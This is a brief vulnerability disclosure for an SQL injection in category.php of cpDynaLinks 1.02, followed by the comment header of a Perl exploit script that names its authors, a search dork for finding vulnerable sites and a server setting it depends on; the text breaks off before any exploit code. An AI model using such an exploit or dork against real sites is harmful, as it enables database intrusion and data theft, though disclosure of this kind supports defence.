SQL injection vulnerability in category.php in cpDynaLinks 1.02 allows remote malicious users to execute arbitrary SQL commands via the category parameter.
#!/usr/bin/perl
# cpDynaLinks 102 Remote Sql Inyection exploit
# download:
# wwwcplinkscom/download/cpdynalinks/cpdynalinks_version_1_02_fullzip
# bug found by s0cratex
# exploit written by ka0x
# DOM TEAM 2007
# d0rk: Powered by cpDynaLinks
# need magic_quotes_gpc off
# contact: <ka0x01[at]gmailcom> <s0cratex[at]nasagov&g ...